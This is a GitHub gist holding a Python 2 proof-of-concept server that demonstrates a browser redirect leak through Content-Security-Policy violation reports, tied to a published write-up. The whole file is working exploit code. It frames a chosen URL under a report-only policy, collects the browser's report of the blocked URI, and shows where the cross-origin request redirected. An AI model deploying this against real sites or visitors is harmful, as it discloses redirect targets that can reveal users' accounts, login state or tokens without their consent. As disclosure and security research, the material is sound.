Created
March 26, 2020 15:48
-
-
Save malaya-zemlya/a943b970797c96015134bd45fa948f33 to your computer and use it in GitHub Desktop.
Redirect leak via CSP Report
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
""" | |
POC of a redirect leak via CSP reports | |
as described in https://obmiblog.blogspot.com/2019/12/gcp-5k-file-uploading-csrf.html | |
Usage: navigate to http://localhost:8080/?http://url.to.check/ | |
Works on Chrome v77 and Safari v13.0.5 | |
On Firefox does the right thing and returns the original frame URL | |
""" | |
import json | |
import urllib | |
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer | |
# TCP port the demo HTTP server binds to.
PORT_NUMBER = 8080

# Shared between requests: the /leak handler stores the blocked URI from a
# CSP report under the request's raw query string, and the /ajax handler
# looks it up again by the same key.
global_url_store = {}
def parse_path(path):
    """Split a request target into ``(path, query)``.

    Everything after the first ``?`` is the query. A query of the form
    ``p=<value>`` (as submitted by the HTML form) is reduced to the
    percent-decoded ``<value>``; any other query is returned untouched.
    A target without ``?`` yields an empty query.
    """
    location, _, query = path.partition('?')
    if query.startswith('p='):
        query = urllib.unquote(query[2:])
    return location, query
def escape_entities(s):
    """Quick and dirty escaping of HTML special characters.

    Replaces ``&``, ``<``, ``>``, ``'`` and ``"`` with character references
    so that *s* can be placed in HTML text or inside a quoted attribute.
    """
    # '&' must be handled first, otherwise the ampersands introduced by the
    # later replacements would themselves be escaped a second time.
    return (s.replace('&', '&amp;')
             .replace('<', '&lt;')
             .replace('>', '&gt;')
             .replace('\'', '&#39;')
             .replace('"', '&quot;'))
def js_escape(s):
    """Quick and dirty escaping for embedding *s* in a JS string literal.

    Alphanumeric characters are kept as they are; every other character is
    written as a ``\\uXXXX`` escape of its code point (at least four hex
    digits, lower case).
    """
    return ''.join(
        ch if ch.isalnum() else '\\u{:04x}'.format(ord(ch))
        for ch in s
    )
def generate_script(url):
    """Build the inline JavaScript for the demo page.

    After a one-second delay the script fetches *url* from this server,
    parses the response as JSON and shows its ``uri`` field in the element
    with id ``out``. *url* is inserted into a single-quoted JS string
    literal, so the caller must pass it already escaped for that context.
    """
    template = r"""
setTimeout(function(){
    fetch('%s')
        .then((response) => {
            return response.json();
        })
        .then((data) => {
            document.getElementById('out').innerText = 'Redirects to ' + data['uri']
        });
}, 1000)
"""
    return template % url
class myHandler(BaseHTTPRequestHandler):
    """Request handler for the CSP-report redirect-leak proof of concept.

    Routes:
      GET  /      -- demo page that frames the target URL
      GET  /ajax  -- JSON lookup of the blocked URI stored for a target
      POST /leak  -- sink for the browser's CSP violation reports

    For /ajax and /leak the raw query string (the percent-encoded target
    URL generated by handleRoot) is used verbatim as the key into
    ``global_url_store``.

    Written for Python 2: response bodies are written as ``str``.
    """

    def _send_not_found(self):
        """Send a complete plain-text 404 response."""
        self.send_response(404)
        self.send_header("Content-type", "text/plain")
        # Without end_headers() the body would be emitted inside the header
        # block and the client would receive a malformed response.
        self.end_headers()
        self.wfile.write("not found")

    # page at /?{url to be queried} or /?p={url to be queried}
    def handleRoot(self, query):
        """Write the headers and body of the demo page.

        The status line has already been sent by do_GET. *query* is the
        URL to frame; when empty, a built-in demo URL is used.
        """
        src_url = query or "http://tiny.cc/szjylz"  # demo url, redirects to vk.com
        quoted_url = urllib.quote(src_url)
        escaped_url = escape_entities(src_url)

        self.send_header("Content-type", "text/html")
        # Report-only policy: its purpose here is to make the browser POST a
        # violation report for the framed URL to /leak, keyed by quoted_url.
        self.send_header(
            "Content-Security-Policy-Report-Only",
            "frame-src " + quoted_url + "; report-uri /leak?" + quoted_url)
        self.end_headers()

        # The page script polls /ajax with the same key the report is
        # stored under by handleLeak.
        script = generate_script(url="/ajax?" + js_escape(quoted_url))
        self.wfile.write("".join([
            "<!doctype html><html><body>\n",
            "<h3>Iframe source: " + escaped_url + "</h3>\n",
            "<iframe style='width:200px' src='" + escaped_url + "'></iframe>\n",
            "<script>" + script + "</script>\n",
            "<div id=out></div>\n",
            "<form action='/' method=GET><input style='width:200px' name=p type=text size=50 placeholder='enter a url'></form>",
            "</body></html>",
        ]))

    # page at /ajax?{percent-encoded url to be queried}
    def handleAjax(self, query):
        """Reply with ``{"uri": <blocked URI stored for query, or "">}``.

        The status line has already been sent by do_GET.
        """
        # The body is JSON (the page reads it via response.json()).
        self.send_header("Content-type", "application/json")
        self.end_headers()
        uri = global_url_store.get(query, "")
        print("GET: " + query + " => " + uri)
        self.wfile.write(json.dumps({"uri": uri}))

    def do_GET(self):
        """Dispatch GET requests to the root page or the /ajax lookup."""
        path, query = parse_path(self.path)
        if path == "/":
            self.send_response(200)
            self.handleRoot(query)
        elif path == "/ajax":
            self.send_response(200)
            self.handleAjax(query)
        else:
            self._send_not_found()

    # page at /leak?{percent-encoded url to be queried}
    def handleLeak(self, query):
        """Store the ``blocked-uri`` of a posted CSP report under *query*.

        Replies 204 on success. A malformed Content-Length or a body that
        is not valid JSON is answered with 400 and nothing is stored. A
        request without Content-Length, or a report lacking a string
        ``blocked-uri``, stores an empty string.
        """
        report = {}
        if "Content-Length" in self.headers:
            try:
                length = int(self.headers["Content-Length"])
                if length < 0:
                    # read() with a negative size would block until EOF.
                    raise ValueError("negative Content-Length")
                report = json.loads(self.rfile.read(length))
            except ValueError:
                self.send_response(400)
                self.end_headers()
                return

        # The body comes from the network: do not assume it has the
        # {"csp-report": {"blocked-uri": "..."}} shape.
        csp_report = report.get("csp-report", {}) if isinstance(report, dict) else {}
        target_uri = csp_report.get("blocked-uri", "") if isinstance(csp_report, dict) else ""
        if not isinstance(target_uri, (str, type(u""))):
            target_uri = ""

        global_url_store[query] = target_uri
        print("SET: " + query + " => " + target_uri)
        self.send_response(204)
        self.send_header("Content-type", "application/json")
        self.end_headers()

    def do_POST(self):
        """Dispatch POST requests; only /leak is served."""
        path, query = parse_path(self.path)
        if path == "/leak":
            self.handleLeak(query)
        else:
            self._send_not_found()
def main():
    """Run the proof-of-concept server until interrupted with Ctrl-C."""
    # Standard python http server stuff. The server is created before the
    # try block so that `server` is always bound when the cleanup runs.
    server = HTTPServer(("", PORT_NUMBER), myHandler)
    print("Started httpserver on port %d" % PORT_NUMBER)
    try:
        # Wait forever for incoming http requests
        server.serve_forever()
    except KeyboardInterrupt:
        print("^C received, shutting down the web server")
    finally:
        # Release the listening socket however serve_forever() ended.
        server.server_close()


if __name__ == "__main__":
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment